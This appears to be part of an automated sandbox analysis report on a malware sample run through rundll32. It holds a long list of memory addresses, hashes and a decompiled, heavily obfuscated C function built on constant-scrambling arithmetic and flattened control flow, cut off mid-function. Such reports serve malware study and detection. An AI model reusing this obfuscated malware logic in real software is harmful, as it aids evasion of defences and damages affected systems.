                                                                                                                                  0x002e5f98
                                                                                                                                  0x002e5fa0
                                                                                                                                  0x002e5fa8
                                                                                                                                  0x002e5fb0
                                                                                                                                  0x002e5fb8
                                                                                                                                  0x002e5fc0
                                                                                                                                  0x002e5fcb
                                                                                                                                  0x002e5fd6
                                                                                                                                  0x002e5fe1
                                                                                                                                  0x002e5fec
                                                                                                                                  0x002e5ff7
                                                                                                                                  0x002e6002
                                                                                                                                  0x002e6012
                                                                                                                                  0x002e6016
                                                                                                                                  0x002e601e
                                                                                                                                  0x002e6026
                                                                                                                                  0x002e602e
                                                                                                                                  0x002e6033
                                                                                                                                  0x002e6040
                                                                                                                                  0x002e6044
                                                                                                                                  0x002e604c
                                                                                                                                  0x002e6058
                                                                                                                                  0x002e605b
                                                                                                                                  0x002e605f
                                                                                                                                  0x002e6067
                                                                                                                                  0x002e606f
                                                                                                                                  0x002e6077
                                                                                                                                  0x002e607f
                                                                                                                                  0x002e6084
                                                                                                                                  0x002e608e
                                                                                                                                  0x002e6096
                                                                                                                                  0x002e609c
                                                                                                                                  0x002e60a1
                                                                                                                                  0x002e60a5
                                                                                                                                  0x002e60ad
                                                                                                                                  0x002e60b5
                                                                                                                                  0x002e60bd
                                                                                                                                  0x002e60cd
                                                                                                                                  0x002e60d3
                                                                                                                                  0x002e60db
                                                                                                                                  0x002e60e0
                                                                                                                                  0x002e60e8
                                                                                                                                  0x002e60fb
                                                                                                                                  0x002e60fe
                                                                                                                                  0x002e6105
                                                                                                                                  0x002e6110
                                                                                                                                  0x002e6118
                                                                                                                                  0x002e6120
                                                                                                                                  0x002e6128
                                                                                                                                  0x002e6130
                                                                                                                                  0x002e6138
                                                                                                                                  0x002e6140
                                                                                                                                  0x002e6145
                                                                                                                                  0x002e614d
                                                                                                                                  0x002e6155
                                                                                                                                  0x002e615d
                                                                                                                                  0x002e616a
                                                                                                                                  0x002e616e
                                                                                                                                  0x002e6176
                                                                                                                                  0x002e617e
                                                                                                                                  0x002e6186
                                                                                                                                  0x002e6191
                                                                                                                                  0x002e619c
                                                                                                                                  0x002e61a7
                                                                                                                                  0x002e61af
                                                                                                                                  0x002e61b7
                                                                                                                                  0x002e61bf
                                                                                                                                  0x002e61c7
                                                                                                                                  0x002e61cf
                                                                                                                                  0x002e61da
                                                                                                                                  0x002e61e2
                                                                                                                                  0x002e61ed
                                                                                                                                  0x002e61f5
                                                                                                                                  0x002e61fd
                                                                                                                                  0x002e6202
                                                                                                                                  0x002e620a
                                                                                                                                  0x002e6212
                                                                                                                                  0x002e621a
                                                                                                                                  0x002e6224
                                                                                                                                  0x002e6228
                                                                                                                                  0x002e622d
                                                                                                                                  0x002e6235
                                                                                                                                  0x002e6240
                                                                                                                                  0x002e624b
                                                                                                                                  0x002e6256
                                                                                                                                  0x002e625e
                                                                                                                                  0x002e626e
                                                                                                                                  0x002e6272
                                                                                                                                  0x002e6277
                                                                                                                                  0x002e627f
                                                                                                                                  0x002e628b
                                                                                                                                  0x002e628e
                                                                                                                                  0x002e6297
                                                                                                                                  0x002e629b
                                                                                                                                  0x002e62a3
                                                                                                                                  0x002e62ab
                                                                                                                                  0x002e62b5
                                                                                                                                  0x002e62bd
                                                                                                                                  0x002e62c5
                                                                                                                                  0x002e62d0
                                                                                                                                  0x002e62db
                                                                                                                                  0x002e62e6
                                                                                                                                  0x002e62ee
                                                                                                                                  0x002e62f6
                                                                                                                                  0x002e62fe
                                                                                                                                  0x002e6306
                                                                                                                                  0x002e631b
                                                                                                                                  0x002e631c
                                                                                                                                  0x002e6323
                                                                                                                                  0x002e632a
                                                                                                                                  0x002e6331
                                                                                                                                  0x002e633c
                                                                                                                                  0x002e6344
                                                                                                                                  0x002e634f
                                                                                                                                  0x002e6356
                                                                                                                                  0x002e635a
                                                                                                                                  0x002e6362
                                                                                                                                  0x002e636d
                                                                                                                                  0x002e6378
                                                                                                                                  0x002e6383
                                                                                                                                  0x002e638e
                                                                                                                                  0x002e6396
                                                                                                                                  0x002e63a1
                                                                                                                                  0x002e63a1
                                                                                                                                  0x002e63a6
                                                                                                                                  0x002e63a8
                                                                                                                                  0x002e63a9
                                                                                                                                  0x002e63a9
                                                                                                                                  0x002e63a9
                                                                                                                                  0x002e63a9
                                                                                                                                  0x002e63ab
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e63b1
                                                                                                                                  0x002e64ef
                                                                                                                                  0x002e64f4
                                                                                                                                  0x00000000
                                                                                                                                  0x002e63b7
                                                                                                                                  0x002e63bd
                                                                                                                                  0x002e64bb
                                                                                                                                  0x002e64c1
                                                                                                                                  0x002e64c9
                                                                                                                                  0x002e64c9
                                                                                                                                  0x002e64cc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e64c6
                                                                                                                                  0x002e64c6
                                                                                                                                  0x002e64c6
                                                                                                                                  0x002e64ce
                                                                                                                                  0x002e64d1
                                                                                                                                  0x00000000
                                                                                                                                  0x002e63c3
                                                                                                                                  0x002e63c9
                                                                                                                                  0x002e649d
                                                                                                                                  0x002e649f
                                                                                                                                  0x002e64a2
                                                                                                                                  0x002e64a4
                                                                                                                                  0x002e64f7
                                                                                                                                  0x002e64f7
                                                                                                                                  0x002e63a8
                                                                                                                                  0x00000000
                                                                                                                                  0x002e64a6
                                                                                                                                  0x002e64a6
                                                                                                                                  0x002e64ab
                                                                                                                                  0x002e63a6
                                                                                                                                  0x002e63a8
                                                                                                                                  0x00000000
                                                                                                                                  0x002e63a8
                                                                                                                                  0x002e63a6
                                                                                                                                  0x002e63cb
                                                                                                                                  0x002e63d1

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $Ym$94$>>$A*$Cu$FjeY$P5$Q]$Rv$T`L5$XQ $d{ $H
                                                                                                                                  • API String ID: 0-2231434368
                                                                                                                                  • Opcode ID: 9fee7601b5a1a9601d625c18c74ec453cd4f5a13f6c01c9a71d2a8b0184f7a32
                                                                                                                                  • Instruction ID: ba5dbd384b98db2d49d75cb65b4a43e29e0498b4b4d04172ae9c2c81514f15d7
                                                                                                                                  • Opcode Fuzzy Hash: 9fee7601b5a1a9601d625c18c74ec453cd4f5a13f6c01c9a71d2a8b0184f7a32
                                                                                                                                  • Instruction Fuzzy Hash: 73224271518380DFD768CF66C58AA9BFBE2FBC4744F50891DE29A86260D7B18849CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                  			E002E6DF8(void* __ecx) {
                                                                                                                                  				char _v524;
                                                                                                                                  				char _v1044;
                                                                                                                                  				char _v1564;
                                                                                                                                  				short _v1568;
                                                                                                                                  				short _v1572;
                                                                                                                                  				intOrPtr _v1576;
                                                                                                                                  				intOrPtr _v1580;
                                                                                                                                  				intOrPtr _v1592;
                                                                                                                                  				char _v1596;
                                                                                                                                  				char _v1600;
                                                                                                                                  				signed int _v1604;
                                                                                                                                  				signed int _v1608;
                                                                                                                                  				signed int _v1612;
                                                                                                                                  				signed int _v1616;
                                                                                                                                  				signed int _v1620;
                                                                                                                                  				signed int _v1624;
                                                                                                                                  				signed int _v1628;
                                                                                                                                  				signed int _v1632;
                                                                                                                                  				signed int _v1636;
                                                                                                                                  				signed int _v1640;
                                                                                                                                  				signed int _v1644;
                                                                                                                                  				signed int _v1648;
                                                                                                                                  				signed int _v1652;
                                                                                                                                  				signed int _v1656;
                                                                                                                                  				signed int _v1660;
                                                                                                                                  				signed int _v1664;
                                                                                                                                  				signed int _v1668;
                                                                                                                                  				signed int _v1672;
                                                                                                                                  				signed int _v1676;
                                                                                                                                  				signed int _v1680;
                                                                                                                                  				signed int _v1684;
                                                                                                                                  				signed int _v1688;
                                                                                                                                  				signed int _v1692;
                                                                                                                                  				signed int _v1696;
                                                                                                                                  				signed int _v1700;
                                                                                                                                  				signed int _v1704;
                                                                                                                                  				signed int _v1708;
                                                                                                                                  				signed int _v1712;
                                                                                                                                  				signed int _v1716;
                                                                                                                                  				signed int _v1720;
                                                                                                                                  				signed int _v1724;
                                                                                                                                  				signed int _v1728;
                                                                                                                                  				signed int _v1732;
                                                                                                                                  				signed int _v1736;
                                                                                                                                  				signed int _v1740;
                                                                                                                                  				signed int _v1744;
                                                                                                                                  				signed int _v1748;
                                                                                                                                  				signed int _v1752;
                                                                                                                                  				signed int _v1756;
                                                                                                                                  				signed int _v1760;
                                                                                                                                  				signed int _v1764;
                                                                                                                                  				signed int _v1768;
                                                                                                                                  				signed int _v1772;
                                                                                                                                  				signed int _v1776;
                                                                                                                                  				signed int _v1780;
                                                                                                                                  				signed int _v1784;
                                                                                                                                  				signed int _v1788;
                                                                                                                                  				signed int _v1792;
                                                                                                                                  				signed int _v1796;
                                                                                                                                  				signed int _v1800;
                                                                                                                                  				signed int _v1804;
                                                                                                                                  				signed int _v1808;
                                                                                                                                  				signed int _v1812;
                                                                                                                                  				signed int _v1816;
                                                                                                                                  				signed int _v1820;
                                                                                                                                  				signed int _v1824;
                                                                                                                                  				signed int _v1828;
                                                                                                                                  				signed int _v1832;
                                                                                                                                  				signed int _v1836;
                                                                                                                                  				signed int _v1840;
                                                                                                                                  				signed int _v1844;
                                                                                                                                  				void* _t583;
                                                                                                                                  				void* _t585;
                                                                                                                                  				void* _t592;
                                                                                                                                  				void* _t603;
                                                                                                                                  				void* _t606;
                                                                                                                                  				void* _t609;
                                                                                                                                  				signed int _t611;
                                                                                                                                  				signed int _t612;
                                                                                                                                  				signed int _t613;
                                                                                                                                  				signed int _t614;
                                                                                                                                  				signed int _t615;
                                                                                                                                  				signed int _t616;
                                                                                                                                  				signed int _t617;
                                                                                                                                  				signed int _t618;
                                                                                                                                  				signed int _t619;
                                                                                                                                  				void* _t620;
                                                                                                                                  				signed int _t674;
                                                                                                                                  				char _t675;
                                                                                                                                  				void* _t677;
                                                                                                                                  				signed int* _t682;
                                                                                                                                  
                                                                                                                                  				_t682 =  &_v1844;
                                                                                                                                  				_v1580 = 0x812dcc;
                                                                                                                                  				_v1600 = 0;
                                                                                                                                  				_v1572 = 0;
                                                                                                                                  				_v1568 = 0;
                                                                                                                                  				_v1576 = 0x4b1be1;
                                                                                                                                  				_v1604 = 0xb0e9fc;
                                                                                                                                  				_v1604 = _v1604 >> 0xe;
                                                                                                                                  				_v1604 = _v1604 ^ 0x020002c3;
                                                                                                                                  				_v1816 = 0x316963;
                                                                                                                                  				_v1816 = _v1816 ^ 0x05c37e76;
                                                                                                                                  				_v1816 = _v1816 * 0x44;
                                                                                                                                  				_t609 = __ecx;
                                                                                                                                  				_v1816 = _v1816 << 6;
                                                                                                                                  				_t677 = 0xb42e112;
                                                                                                                                  				_v1816 = _v1816 ^ 0x13878f70;
                                                                                                                                  				_v1648 = 0xe65aa1;
                                                                                                                                  				_v1648 = _v1648 + 0xffffb7c7;
                                                                                                                                  				_v1648 = _v1648 ^ 0x00e866e0;
                                                                                                                                  				_v1608 = 0x4e6d43;
                                                                                                                                  				_v1608 = _v1608 << 3;
                                                                                                                                  				_v1608 = _v1608 ^ 0x027e4d7c;
                                                                                                                                  				_v1792 = 0x62c447;
                                                                                                                                  				_v1792 = _v1792 + 0xfffff9b0;
                                                                                                                                  				_v1792 = _v1792 + 0xffff1ab6;
                                                                                                                                  				_v1792 = _v1792 ^ 0x5826ec20;
                                                                                                                                  				_v1792 = _v1792 ^ 0x58465e47;
                                                                                                                                  				_v1616 = 0xd881ce;
                                                                                                                                  				_t611 = 0x1c;
                                                                                                                                  				_v1616 = _v1616 / _t611;
                                                                                                                                  				_v1616 = _v1616 ^ 0x00049a8c;
                                                                                                                                  				_v1784 = 0x225701;
                                                                                                                                  				_v1784 = _v1784 ^ 0x455f73cc;
                                                                                                                                  				_v1784 = _v1784 + 0x2d0b;
                                                                                                                                  				_v1784 = _v1784 + 0xffff7069;
                                                                                                                                  				_v1784 = _v1784 ^ 0x457ed570;
                                                                                                                                  				_v1656 = 0xa0746c;
                                                                                                                                  				_v1656 = _v1656 << 5;
                                                                                                                                  				_v1656 = _v1656 ^ 0x1405cb88;
                                                                                                                                  				_v1756 = 0x86f3a;
                                                                                                                                  				_v1756 = _v1756 << 0xf;
                                                                                                                                  				_v1756 = _v1756 + 0xffff9aa0;
                                                                                                                                  				_v1756 = _v1756 ^ 0x379e88f8;
                                                                                                                                  				_v1840 = 0x372205;
                                                                                                                                  				_v1840 = _v1840 << 0xb;
                                                                                                                                  				_v1840 = _v1840 >> 1;
                                                                                                                                  				_t612 = 0x47;
                                                                                                                                  				_v1840 = _v1840 * 0x27;
                                                                                                                                  				_v1840 = _v1840 ^ 0x18b0e4c5;
                                                                                                                                  				_v1720 = 0x55473e;
                                                                                                                                  				_v1720 = _v1720 >> 0xe;
                                                                                                                                  				_v1720 = _v1720 + 0xffff4222;
                                                                                                                                  				_v1720 = _v1720 ^ 0xfff7d1f7;
                                                                                                                                  				_v1760 = 0x8a22d4;
                                                                                                                                  				_v1760 = _v1760 ^ 0x5338d916;
                                                                                                                                  				_v1760 = _v1760 / _t612;
                                                                                                                                  				_v1760 = _v1760 ^ 0x01221ec9;
                                                                                                                                  				_v1716 = 0x7ad7ec;
                                                                                                                                  				_v1716 = _v1716 ^ 0xb2734e10;
                                                                                                                                  				_v1716 = _v1716 ^ 0xf628ba0e;
                                                                                                                                  				_v1716 = _v1716 ^ 0x44287105;
                                                                                                                                  				_v1624 = 0x6426f4;
                                                                                                                                  				_v1624 = _v1624 * 0x29;
                                                                                                                                  				_v1624 = _v1624 ^ 0x100ef306;
                                                                                                                                  				_v1728 = 0x3e505e;
                                                                                                                                  				_v1728 = _v1728 >> 8;
                                                                                                                                  				_t613 = 0x3a;
                                                                                                                                  				_v1728 = _v1728 / _t613;
                                                                                                                                  				_v1728 = _v1728 ^ 0x00050efb;
                                                                                                                                  				_v1752 = 0x3958e2;
                                                                                                                                  				_v1752 = _v1752 ^ 0x62ae6d50;
                                                                                                                                  				_v1752 = _v1752 ^ 0x97f7befb;
                                                                                                                                  				_v1752 = _v1752 ^ 0xf561088c;
                                                                                                                                  				_v1688 = 0xb21a91;
                                                                                                                                  				_v1688 = _v1688 ^ 0x7ffc0397;
                                                                                                                                  				_v1688 = _v1688 ^ 0x7f439e8f;
                                                                                                                                  				_v1620 = 0xd8d2d1;
                                                                                                                                  				_v1620 = _v1620 + 0x194e;
                                                                                                                                  				_v1620 = _v1620 ^ 0x00d523c5;
                                                                                                                                  				_v1696 = 0xa820cb;
                                                                                                                                  				_v1696 = _v1696 + 0x8b3c;
                                                                                                                                  				_v1696 = _v1696 ^ 0x00a28581;
                                                                                                                                  				_v1680 = 0x121bc4;
                                                                                                                                  				_t674 = 0x7a;
                                                                                                                                  				_v1680 = _v1680 / _t674;
                                                                                                                                  				_v1680 = _v1680 ^ 0x0006e996;
                                                                                                                                  				_v1744 = 0x9924c6;
                                                                                                                                  				_v1744 = _v1744 << 4;
                                                                                                                                  				_t614 = 0x11;
                                                                                                                                  				_v1744 = _v1744 * 0x36;
                                                                                                                                  				_v1744 = _v1744 ^ 0x04d385a1;
                                                                                                                                  				_v1632 = 0x653a8;
                                                                                                                                  				_v1632 = _v1632 * 0x63;
                                                                                                                                  				_v1632 = _v1632 ^ 0x027c9a7f;
                                                                                                                                  				_v1672 = 0x158278;
                                                                                                                                  				_v1672 = _v1672 + 0xffff088d;
                                                                                                                                  				_v1672 = _v1672 ^ 0x001491ab;
                                                                                                                                  				_v1832 = 0x486b88;
                                                                                                                                  				_v1832 = _v1832 + 0xffff9f3d;
                                                                                                                                  				_v1832 = _v1832 >> 3;
                                                                                                                                  				_v1832 = _v1832 | 0x023d4c2b;
                                                                                                                                  				_v1832 = _v1832 ^ 0x0230cd37;
                                                                                                                                  				_v1612 = 0xd2c4ef;
                                                                                                                                  				_v1612 = _v1612 * 0x5a;
                                                                                                                                  				_v1612 = _v1612 ^ 0x4a177333;
                                                                                                                                  				_v1776 = 0x829598;
                                                                                                                                  				_v1776 = _v1776 << 0xe;
                                                                                                                                  				_v1776 = _v1776 >> 2;
                                                                                                                                  				_v1776 = _v1776 | 0x8c8c5501;
                                                                                                                                  				_v1776 = _v1776 ^ 0xaddb19b6;
                                                                                                                                  				_v1712 = 0x169d18;
                                                                                                                                  				_v1712 = _v1712 / _t614;
                                                                                                                                  				_v1712 = _v1712 >> 0xa;
                                                                                                                                  				_v1712 = _v1712 ^ 0x000c26db;
                                                                                                                                  				_v1704 = 0xb2b50;
                                                                                                                                  				_v1704 = _v1704 ^ 0x2de07b8f;
                                                                                                                                  				_v1704 = _v1704 ^ 0x2de0ad86;
                                                                                                                                  				_v1800 = 0x9652d5;
                                                                                                                                  				_t615 = 3;
                                                                                                                                  				_v1800 = _v1800 * 0x68;
                                                                                                                                  				_v1800 = _v1800 / _t615;
                                                                                                                                  				_v1800 = _v1800 << 0xa;
                                                                                                                                  				_v1800 = _v1800 ^ 0x6cd74e85;
                                                                                                                                  				_v1664 = 0x74acab;
                                                                                                                                  				_v1664 = _v1664 | 0xe18c4dd2;
                                                                                                                                  				_v1664 = _v1664 ^ 0xe1f0b032;
                                                                                                                                  				_v1824 = 0x58e83b;
                                                                                                                                  				_t616 = 0x2c;
                                                                                                                                  				_v1824 = _v1824 * 0x2b;
                                                                                                                                  				_v1824 = _v1824 + 0xffff56af;
                                                                                                                                  				_v1824 = _v1824 ^ 0x0c61ca29;
                                                                                                                                  				_v1824 = _v1824 ^ 0x02809c1e;
                                                                                                                                  				_v1764 = 0x974237;
                                                                                                                                  				_v1764 = _v1764 << 0xb;
                                                                                                                                  				_v1764 = _v1764 * 0x31;
                                                                                                                                  				_v1764 = _v1764 ^ 0x9d674e65;
                                                                                                                                  				_v1736 = 0xc3f98b;
                                                                                                                                  				_v1736 = _v1736 * 0x5e;
                                                                                                                                  				_v1736 = _v1736 | 0x641bd8e3;
                                                                                                                                  				_v1736 = _v1736 ^ 0x67f85735;
                                                                                                                                  				_v1700 = 0xe4f15c;
                                                                                                                                  				_v1700 = _v1700 | 0xddaa88b0;
                                                                                                                                  				_v1700 = _v1700 ^ 0xdde3c6d3;
                                                                                                                                  				_v1844 = 0x9b3502;
                                                                                                                                  				_v1844 = _v1844 ^ 0x47d60286;
                                                                                                                                  				_v1844 = _v1844 / _t616;
                                                                                                                                  				_v1844 = _v1844 ^ 0x0193d551;
                                                                                                                                  				_v1640 = 0xffe1b1;
                                                                                                                                  				_t617 = 0x39;
                                                                                                                                  				_v1640 = _v1640 * 0x7b;
                                                                                                                                  				_v1640 = _v1640 ^ 0x7af2e2c5;
                                                                                                                                  				_v1808 = 0x2876e6;
                                                                                                                                  				_v1808 = _v1808 | 0x109585e0;
                                                                                                                                  				_v1808 = _v1808 << 0xd;
                                                                                                                                  				_v1808 = _v1808 + 0x9cd3;
                                                                                                                                  				_v1808 = _v1808 ^ 0xbefbba98;
                                                                                                                                  				_v1676 = 0xd3b2e1;
                                                                                                                                  				_v1676 = _v1676 << 0xf;
                                                                                                                                  				_v1676 = _v1676 ^ 0xd9748eec;
                                                                                                                                  				_v1836 = 0x3e007f;
                                                                                                                                  				_v1836 = _v1836 + 0xffffe462;
                                                                                                                                  				_v1836 = _v1836 >> 9;
                                                                                                                                  				_v1836 = _v1836 >> 6;
                                                                                                                                  				_v1836 = _v1836 ^ 0x000afa23;
                                                                                                                                  				_v1684 = 0x2c402;
                                                                                                                                  				_v1684 = _v1684 >> 0xa;
                                                                                                                                  				_v1684 = _v1684 ^ 0x0000130c;
                                                                                                                                  				_v1692 = 0x94252b;
                                                                                                                                  				_v1692 = _v1692 / _t617;
                                                                                                                                  				_v1692 = _v1692 ^ 0x000dcb04;
                                                                                                                                  				_v1828 = 0xd5c7f6;
                                                                                                                                  				_v1828 = _v1828 * 0x41;
                                                                                                                                  				_v1828 = _v1828 + 0x5616;
                                                                                                                                  				_v1828 = _v1828 >> 9;
                                                                                                                                  				_v1828 = _v1828 ^ 0x001e39c7;
                                                                                                                                  				_v1740 = 0xceff06;
                                                                                                                                  				_v1740 = _v1740 << 0xe;
                                                                                                                                  				_v1740 = _v1740 << 8;
                                                                                                                                  				_v1740 = _v1740 ^ 0xc18fb5bb;
                                                                                                                                  				_v1748 = 0x414330;
                                                                                                                                  				_v1748 = _v1748 * 0x1d;
                                                                                                                                  				_v1748 = _v1748 | 0x5a6f0d55;
                                                                                                                                  				_v1748 = _v1748 ^ 0x5f6ea92a;
                                                                                                                                  				_v1668 = 0xd2b255;
                                                                                                                                  				_v1668 = _v1668 ^ 0xc5d7949e;
                                                                                                                                  				_v1668 = _v1668 ^ 0xc50ba027;
                                                                                                                                  				_v1796 = 0xab825d;
                                                                                                                                  				_v1796 = _v1796 << 0xc;
                                                                                                                                  				_v1796 = _v1796 + 0xd01b;
                                                                                                                                  				_t618 = 0x22;
                                                                                                                                  				_v1796 = _v1796 / _t618;
                                                                                                                                  				_v1796 = _v1796 ^ 0x056bf222;
                                                                                                                                  				_v1724 = 0x6f3f31;
                                                                                                                                  				_v1724 = _v1724 + 0x5a62;
                                                                                                                                  				_v1724 = _v1724 / _t674;
                                                                                                                                  				_v1724 = _v1724 ^ 0x0002d040;
                                                                                                                                  				_v1652 = 0x230f16;
                                                                                                                                  				_v1652 = _v1652 ^ 0x902061d9;
                                                                                                                                  				_v1652 = _v1652 ^ 0x9007a9ef;
                                                                                                                                  				_v1804 = 0xb250d0;
                                                                                                                                  				_v1804 = _v1804 << 7;
                                                                                                                                  				_v1804 = _v1804 << 0xe;
                                                                                                                                  				_v1804 = _v1804 >> 0x10;
                                                                                                                                  				_v1804 = _v1804 ^ 0x000e0b76;
                                                                                                                                  				_v1644 = 0x39b2ec;
                                                                                                                                  				_v1644 = _v1644 >> 5;
                                                                                                                                  				_v1644 = _v1644 ^ 0x0004ae9a;
                                                                                                                                  				_v1708 = 0x41b5f8;
                                                                                                                                  				_v1708 = _v1708 << 9;
                                                                                                                                  				_v1708 = _v1708 + 0xfffffd74;
                                                                                                                                  				_v1708 = _v1708 ^ 0x836650ae;
                                                                                                                                  				_v1768 = 0xd924a5;
                                                                                                                                  				_t619 = 0x26;
                                                                                                                                  				_v1768 = _v1768 * 0x57;
                                                                                                                                  				_v1768 = _v1768 >> 4;
                                                                                                                                  				_v1768 = _v1768 ^ 0x04932b37;
                                                                                                                                  				_v1788 = 0x72a9d;
                                                                                                                                  				_v1788 = _v1788 >> 0xb;
                                                                                                                                  				_v1788 = _v1788 * 0x3f;
                                                                                                                                  				_v1788 = _v1788 + 0xffffc8d5;
                                                                                                                                  				_v1788 = _v1788 ^ 0x000eb520;
                                                                                                                                  				_v1628 = 0x50edf9;
                                                                                                                                  				_v1628 = _v1628 * 0x73;
                                                                                                                                  				_v1628 = _v1628 ^ 0x245d5801;
                                                                                                                                  				_v1772 = 0x77fe3c;
                                                                                                                                  				_v1772 = _v1772 + 0x89a9;
                                                                                                                                  				_v1772 = _v1772 | 0x772eb6e7;
                                                                                                                                  				_v1772 = _v1772 + 0xffffc435;
                                                                                                                                  				_v1772 = _v1772 ^ 0x777a10e8;
                                                                                                                                  				_v1780 = 0x481950;
                                                                                                                                  				_v1780 = _v1780 >> 0xb;
                                                                                                                                  				_v1780 = _v1780 | 0x104efd63;
                                                                                                                                  				_v1780 = _v1780 + 0xffffd02c;
                                                                                                                                  				_v1780 = _v1780 ^ 0x1043876c;
                                                                                                                                  				_v1636 = 0x899427;
                                                                                                                                  				_v1636 = _v1636 << 0x10;
                                                                                                                                  				_v1636 = _v1636 ^ 0x942ef0bd;
                                                                                                                                  				_v1812 = 0xafb495;
                                                                                                                                  				_v1812 = _v1812 | 0xf73eef3e;
                                                                                                                                  				_v1812 = _v1812 + 0xffffb280;
                                                                                                                                  				_v1812 = _v1812 ^ 0xf7b4985a;
                                                                                                                                  				_v1732 = 0xe6dab0;
                                                                                                                                  				_v1732 = _v1732 + 0x38b;
                                                                                                                                  				_v1732 = _v1732 | 0x5f912f35;
                                                                                                                                  				_v1732 = _v1732 ^ 0x5ff91c81;
                                                                                                                                  				_v1660 = 0xa1ff8d;
                                                                                                                                  				_v1660 = _v1660 / _t619;
                                                                                                                                  				_v1660 = _v1660 ^ 0x000a69c5;
                                                                                                                                  				_v1820 = 0xd15a88;
                                                                                                                                  				_v1820 = _v1820 ^ 0xcd50b9e8;
                                                                                                                                  				_v1820 = _v1820 >> 0x10;
                                                                                                                                  				_v1820 = _v1820 ^ 0xf9319330;
                                                                                                                                  				_v1820 = _v1820 ^ 0xf933c487;
                                                                                                                                  				_t675 = _v1600;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					while(1) {
                                                                                                                                  						L2:
                                                                                                                                  						_t620 = 0x424d9d2;
                                                                                                                                  						do {
                                                                                                                                  							L3:
                                                                                                                                  							while(_t677 != 0x19ebf08) {
                                                                                                                                  								if(_t677 == _t620) {
                                                                                                                                  									_push(_v1600);
                                                                                                                                  									_push(_v1808);
                                                                                                                                  									_t585 = E002ED389( &_v1564, _v1844, _t620,  &_v1596, _v1640, _t620);
                                                                                                                                  									_t682 =  &(_t682[7]);
                                                                                                                                  									__eflags = _t585;
                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                  										E002E1E67(_v1676, _v1836, _v1684, _v1692, _v1596);
                                                                                                                                  										E002E1E67(_v1828, _v1740, _v1748, _v1668, _v1592);
                                                                                                                                  										_t682 =  &(_t682[6]);
                                                                                                                                  									}
                                                                                                                                  									L14:
                                                                                                                                  									_t677 = 0x19ebf08;
                                                                                                                                  									while(1) {
                                                                                                                                  										L1:
                                                                                                                                  										L2:
                                                                                                                                  										_t620 = 0x424d9d2;
                                                                                                                                  										goto L3;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								if(_t677 == 0x5bc69f5) {
                                                                                                                                  									_t592 = E002ED2CE(_t620);
                                                                                                                                  									__eflags = _t592 - E002D3DE2(_t620);
                                                                                                                                  									_t583 = 0x7574965;
                                                                                                                                  									_t677 = 0x8166b1d;
                                                                                                                                  									_t675 =  !=  ? 0x7574965 : 0x1e8df70;
                                                                                                                                  									goto L2;
                                                                                                                                  								}
                                                                                                                                  								if(_t677 == 0x8166b1d) {
                                                                                                                                  									__eflags = _t675 - _t583;
                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                  										_t677 = 0xd369ee2;
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  									_push(_t620);
                                                                                                                                  									_push(_t620);
                                                                                                                                  									_t606 = E002EBB23( &_v1600, _v1616, _v1784, _v1656, _v1604, _v1756);
                                                                                                                                  									_t682 =  &(_t682[6]);
                                                                                                                                  									__eflags = _t606;
                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                  										L12:
                                                                                                                                  										return _t606;
                                                                                                                                  									}
                                                                                                                                  									_t677 = 0xd369ee2;
                                                                                                                                  									goto L1;
                                                                                                                                  								}
                                                                                                                                  								if(_t677 == 0xb42e112) {
                                                                                                                                  									_t677 = 0x5bc69f5;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								if(_t677 == 0xd369ee2) {
                                                                                                                                  									E002EDA22(_v1840, _v1720, __eflags, _v1760,  &_v1044, _t620, _v1716);
                                                                                                                                  									 *((short*)(E002DB6CF( &_v1044, _v1624, _v1728, _v1752))) = 0;
                                                                                                                                  									E002D8969(_v1688,  &_v524, __eflags, _v1620, _v1696);
                                                                                                                                  									_push(_v1632);
                                                                                                                                  									_push(_v1744);
                                                                                                                                  									E002D47CE( &_v1044, _v1672, _v1680, _v1832, _v1612, E002EDCF7(_v1680, 0x2d1328, __eflags),  &_v524, _v1776, _v1712);
                                                                                                                                  									E002DA8B0(_v1704, _t598, _v1800);
                                                                                                                                  									_t603 = E002DEA99(_v1664, _t609, _v1824, _v1764,  &_v1564, _v1736);
                                                                                                                                  									_t682 =  &(_t682[0x17]);
                                                                                                                                  									__eflags = _t603;
                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                  										_t583 = 0x7574965;
                                                                                                                                  										__eflags = _t675 - 0x7574965;
                                                                                                                                  										_t620 = 0x424d9d2;
                                                                                                                                  										_t677 =  ==  ? 0x424d9d2 : 0xe2e667c;
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  									goto L14;
                                                                                                                                  								}
                                                                                                                                  								_t696 = _t677 - 0xe2e667c;
                                                                                                                                  								if(_t677 != 0xe2e667c) {
                                                                                                                                  									goto L25;
                                                                                                                                  								}
                                                                                                                                  								_push(_v1804);
                                                                                                                                  								_push( &_v1564);
                                                                                                                                  								_push(_t620);
                                                                                                                                  								_push(0);
                                                                                                                                  								_push( &_v1596);
                                                                                                                                  								_push(_v1652);
                                                                                                                                  								_push(0);
                                                                                                                                  								_t606 = E002DAB87(_v1796, _v1724, _t696);
                                                                                                                                  								if(_t606 == 0) {
                                                                                                                                  									goto L12;
                                                                                                                                  								}
                                                                                                                                  								E002E1E67(_v1644, _v1708, _v1768, _v1788, _v1596);
                                                                                                                                  								return E002E1E67(_v1628, _v1772, _v1780, _v1636, _v1592);
                                                                                                                                  							}
